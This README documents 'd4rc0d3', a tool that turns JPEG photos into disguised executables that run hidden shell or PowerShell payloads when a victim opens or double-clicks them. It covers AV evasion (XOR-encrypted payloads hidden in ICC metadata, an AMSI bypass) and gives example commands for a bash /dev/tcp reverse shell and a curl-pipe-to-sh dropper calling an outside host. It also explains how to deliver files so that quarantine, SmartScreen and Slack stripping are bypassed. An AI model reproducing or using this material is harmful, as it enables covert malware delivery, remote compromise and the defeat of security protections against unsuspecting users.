# d4rc0d3 Generates a single JPEG file that is simultaneously: - A valid image (displays normally in any viewer) - A shell script — `./photo.jpg` or `sh photo.jpg` on Linux/macOS - A PowerShell script — rename to `.ps1` and run with `pwsh` on Windows - A double-click launcher for macOS, Linux, and Windows --- ## Files ``` D4rc0d3/ ├── src source code of d4rkc0d3_engine (for cross compile / amd-arm-etc) ├── d4rc0d3.py main tool (Python, no external deps beyond stdlib) ├── d4rc0d3_engine compiled engine binary (arm64 Linux version, see "src") ├── cover.jpg sample cover image └── README.md ``` The `d4rc0d3_engine` binary must match the host architecture. To recompile from source: ```bash # Requires: gcc, libturbojpeg-dev, libjpeg-dev cd src/ g++ -std=c++23 -O3 -s -o ../d4rc0d3_engine \ args.cpp bootstrap.cpp file_utils.cpp jpeg_process.cpp \ jpeg_warning_check.cpp d4rc0d3_core.cpp -lturbojpeg -ljpeg -lm ``` --- ## Requirements - Python 3.11+ - No Python dependencies - `d4rc0d3_engine` binary matching the host CPU architecture --- ## How the polyglot works ``` ┌──────────────────────────────────────────────────────────────────┐ │ photo.jpg │ │ │ │ SOI │ │ COM → shell bootstrap (octal-encoded, Perl XOR-decoding pipe) │ │ APP0 → <# opens PowerShell block comment │ │ APP2 → ICC profile: #> closes comment + XOR-decode stub │ │ 16-byte key embedded at ICC offset 102 │ │ JPEG image data (real, displayable photo) │ │ EOI │ │ [post-EOI: base64+XOR payload — scripts and binaries only] │ └──────────────────────────────────────────────────────────────────┘ ./photo.jpg or sh photo.jpg → COM bootstrap runs via sh/bash → Perl XOR-decodes the payload using key from ICC profile → Executes the result pwsh photo.ps1 (after renaming) → APP0 <# opens PS block comment over all binary data → APP2 #> closes the comment — clean PS1 starts here → XOR stub reads key from ICC, decodes and runs payload Image viewer → Reads JPEG header, ignores COM/APP segments it doesn't recognise → Displays the photo normally ``` **AV evasion built into every generated file:** - Payload XOR-encrypted with 16-byte key hidden in JPEG ICC profile metadata - PowerShell executor double char-array encoded — no plaintext `iex`, `Invoke-Expression`, or URL strings - No recognisable dropper strings visible in the raw file - ICC profile fields match a real sRGB color profile (CMM, version, illuminant, etc.) - AMSI bypass injected before PS1 payload execution (patches `AmsiScanBuffer` in memory) --- ## Usage ### Interactive (recommended) ```bash python3 d4rc0d3.py ``` Prompts for image, payload type, command, target platforms, and output directory. ### Command line ``` python3 d4rc0d3.py [OPTIONS] [payload_file] ``` **Payload** (pick one): | Argument | Description | | --------------------------- | ----------------------------------------------------------- | | `-c "command"` | Inline shell command. Slack-safe. Works on all platforms. | | `file.ps1` | PowerShell script. Embedded in ICC profile (XOR-encrypted). | | `file.py` / `file.sh` | Script. base64+XOR in post-EOI. Linux/macOS. | | `file.exe` / `file.elf` | Binary. base64+XOR in post-EOI. Runs on target OS. | | `-c "pre-cmd" file.ps1` | Run pre-command first, then the PS1 file. | **Platform output flags:** | Flag | Output | What victim sees | | --------------- | --------------------- | ---------------------------------- | | *(none)* | `photo.jpg` | — | | `--mac` | `photo.zip` | `photo.jpg` in Finder | | `--linux` | `photo_launch.jpg` | `photo_launch.jpg` (no .desktop) | | `--linux-dot` | `photo.jpg.desktop` | `photo.jpg.desktop` | | `--windows` | `photo.jpg.lnk` | `photo.jpg` in Explorer | | `--all` | all of the above | — | **Other flags:** | Flag | Description | | ------------- | --------------------------------------------- | | `--amsi` | Inject AMSI bypass (default: on for`.ps1`) | | `--no-amsi` | Disable AMSI bypass | | `--show` | Open image viewer on execution | | `--keep` | Keep extracted payload after execution | | `-d DIR` | Extraction directory (default:`/tmp`) | | `-o DIR` | Output directory (default: current directory) | --- ## Examples ```bash # Inline command, generate for all platforms python3 d4rc0d3.py photo.jpg -c "id > /tmp/pwned.txt" --all -o /tmp/out/ # Reverse shell, all platforms python3 d4rc0d3.py photo.jpg -c \ "bash -c 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1'" --all # PowerShell payload with AMSI bypass, Windows + macOS python3 d4rc0d3.py photo.jpg shell.ps1 --windows --mac --amsi -o /tmp/out/ # Python dropper, Linux targets python3 d4rc0d3.py photo.jpg dropper.py --linux --linux-dot -o /tmp/out/ # Dropper: download and execute python3 d4rc0d3.py photo.jpg -c "curl -s http://192.168.1.10/s.sh | sh" --all ``` --- ## Execution on each platform ### Linux / macOS — terminal ```bash # Direct execution (file already has +x) ./photo.jpg # Or explicitly sh photo.jpg # Post-Slack (bash rejects due to NUL bytes injected by Slack) sh photo.jpg ``` ### Windows — PowerShell ```powershell # Rename and run ren photo.jpg photo.ps1 pwsh -ExecutionPolicy Bypass photo.ps1 # Or without renaming powershell -ExecutionPolicy Bypass -File photo.jpg ``` ### Double-click — macOS 1. Send `photo.zip` to the victim (USB or local share — see Notes) 2. Victim extracts the ZIP 3. Finder shows `photo.jpg` — double-click it 4. Preview opens the photo; payload runs silently in background > **Notes:** macOS applies quarantine to files from the internet. > Unsigned bundles trigger a dialog. Deliver via **USB or local SMB share** > — quarantine is not applied, no dialog appears. ### Double-click — Linux - `photo_launch.jpg` — Thunar, Nemo, Caja, Dolphin execute on double-click (content-based MIME detection, no dialog) - `photo.jpg.desktop` — all file managers, Nautilus shows "Trust and Launch" once ### Double-click — Windows Double-click `photo.jpg.lnk` — Explorer hides `.lnk` so the victim sees `photo.jpg`. Runs: `powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File photo.jpg` > **SmartScreen:** may warn for files from the internet. Deliver via USB or internal share. --- ## Payload compatibility | Payload | `sh`/`bash` | `pwsh` | Double-click macOS | Double-click Linux | Post-Slack | | ------------------- | --------------- | -------- | ------------------ | ------------------ | ----------------------- | | `-c` inline | ✓ | ✓ | ✓ | ✓ | ✓ only inline survives | | `.ps1` | ✓ (needs pwsh) | ✓ | ✓ | ✓ (needs pwsh) | ✗ stripped | | `.py` / `.sh` | ✓ | ✗ | ✓ | ✓ | ✗ stripped | | `.exe` / `.elf` | ✓ | ✗ | ✓ | ✓ | ✗ stripped | Slack strips post-EOI data. For Slack delivery use `-c "command"`. After downloading from Slack use `sh photo.jpg` (not `bash`).